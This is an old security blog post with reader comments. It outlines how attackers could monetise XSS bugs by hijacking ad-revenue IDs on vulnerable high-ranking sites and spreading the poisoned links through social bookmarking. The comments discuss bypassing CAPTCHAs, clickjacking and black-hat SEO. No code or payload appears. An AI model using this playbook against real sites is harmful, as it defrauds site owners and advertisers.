How To Make Money With XSS

Mon, 10 Sep 2007 15:27:59 GMT
by pdp

Finding XSS is dead easy task. Everybody is vulnerable to this type of issue and even if there are protection mechanisms on place such as application firewalls and sanitization filters, very often attackers can get a stable exploit working in a matter of a couple of minutes. In fact, I don't think that there are unstable XSS exploits. It is not like the attacker have to manipulate the stack or a corrupted heap in order to get some sort of execution control. No! It is a simple injection issue.

In this post I am going to summarize one of the attack strategies, which I discussed in detail in my paper For my next trick - hacking Web2.0, and talked about it over here. We are going to look at a very basic scenario which outlines a possible technique attackers can use in order to make money out of XSS vulnerabilities.

The strategy is quite simple. First of all attackers need is a bunch of XSS issues for various sites. The higher ranking these sites have, the more money they will make. A good starting point is The attacker can simply grab the high ranking sites from known lists and use them for the strategy that follows. On the other hand, a simple python script in combination with could serves the same purpose.

So, at this stage the attackers have XSS attacks ready to be deployed. The next stage is to come up with a generic payload for all of them. This step is quite simple as well. In regards to the initial idea, there are two ways to make money: direct and indirect. I am going to cover the Ad-jacking one :). The idea is that the attackers plug an XSS payload into the page to hijack the ads revenue. This is a dead easy task. In most cases, all the attackers need to do is to change a simple number. From this point on, everyone who stumbles across the Ad-jacked page and clicks on the any ad, some profit will be made not to the page owner but the attacker. Not cool.

The final stage is to get the XSSed URLs and their payloads out for general consummation. Attackers can use the power of Web2.0 technologies in this case. Social bookmarking sites fit very well here. The more the attackers bookmark the Ad-jacked URLs, the more money they will make out of them. There are even services like OnlyWire, which allows attackers to distribute the URLs to 20 more different social bookmarking websites in a single go. Of course, attackers will keep websites with very, very, very high ranking for services such as DIGG and Reddit for manual submission, since both of them have CAPTCHAs. But, heh, CAPTCHAs can be easy broken as well.

Now search engines, aggregators, and other robotic things will start exploring and crawling the Ad-jacked webistes. People will start visiting them and looking for info inside them and every once in a while someone will click on the ads. The only problem is that site owners will share their profit with the crooks.

So, this is it! More information about this issue is outlined in the paper. Have a look through it if you have time.

Archived Comments

I thought you were going to say something about black hat seo / xss :[
well, if u think about it... this technique is pretty black hat seo like
CAPTCHAs can be easy broken as well.
kork, heh :) no code but you can check out some of the successful projects currently available for free that does break most of the CAPTCHAs. The other day I had a brief discussion with AP about how to break CAPTCHAs. We concluded that almost every CAPTCHA can be broken, in one degree or another, with simple customized scripts and a couple of open source OCR tools from Freshmeat. So, no code is available, and I doubt that we are going to ever publish any code at all on this, mainly because it will be highly unethical. So you have to take my word for it and look into the subject yourself.
CAPTCHAs are dead!
Awesome AnDrEwAwesome AnDrEw
Just like phishing you can use a transparent image as an overlay to subvert clicks to some other site, which could realistically put some money in your pocket depending on the type of traffic the site generates. I think I've read on some SEO sites that this is usually done on sites such as Wikipedia.
Yeah i think this is blackhat SEO technique. Pretty Neat if you ask me. Being doing alot of readin on it. It pawns.
Pdp, nice article! Ad-jacking it's interesting way to make money out of XSS. But what about others ways? :-) Such as black SEO way of making money out of XSS holes. You need to cover different sides of this topic (think about it, maybe in future you'll write about others ways). Though this is interesting one.
Of course, attackers will keep websites with very, very, very high ranking for services such as DIGG and Reddit for manual submission, since both of them have CAPTCHAs
After I read your post in 12.09.2007, I looked at Digg's captcha and found that it's velnerable (to my MustLive CAPTCHA bypass method). So this captcha like a lot of others can be easily bypassed (with my method).
Petko, captchas can be bypassed (using vulnerabilities in them, without any OCR). I explored a lot in this topic last time. Like I wrote at my site (, I'll write an article about my MustLive CAPTCHA bypass method. And I am planning to make event about bypassing a lot of CAPTCHAs ;-) (with my method). I'll write you in detail about this.
kork, there will be a whole of month which I'll make - Month of bugs in CAPTCHAs. This month will be full of codes (exploits) for bypassing captchas all over the Internet. So keep waiting for official announcement. You will be happy ;-), everyone will be happy, especially bad guys, but good guys too.
no code but you can check out some of the successful projects currently available for free that does break most of the CAPTCHAs.
You speaking mostly about OCR breaking of captchas or breaking with manual typing (low cost man power). But there is a way (with my methods - main and advanced) to bypass a lot of captchas in the Internet.
CAPTCHAs are dead!
Not all captchas - many still trying (for their last days). And many still making look that "they are working fine". And many others still believe that captchas can protect them (security site's also - there are a lot of vulnerable captchas on security sites also). But I'll show to web community and their captchas the real life ;-). Very soon Internet will see - the Captchas Apocalypses. A lot of captchas will die. The time has come.
MustLive, you right there there are bugs in CAPTCHA mechanisms but if they are implemented correctly, there is no other way to break out of them but to type the string. So, OCR will remain the primary and most generic way for braking captchas.
I have carried out huge research and collected the most trustworthy sites about online investment in the Internet I choose only update and developing ones and collected them in the same place. They are accessible for everybody. I offer you to acquaint with them ( online investing bookmak ) If somebody can supplement my list please publish here your research or bookmark PS I am sorry if my message out of forum topic or it`s not interesting to community.
nice information, i have already read about the SEO but i don't know how to use that black hot SEO..
XSS can be a good way to get some backlinks. Creating a HTML page that has 100s of HTML links and having the spider index it. Thanks for this article!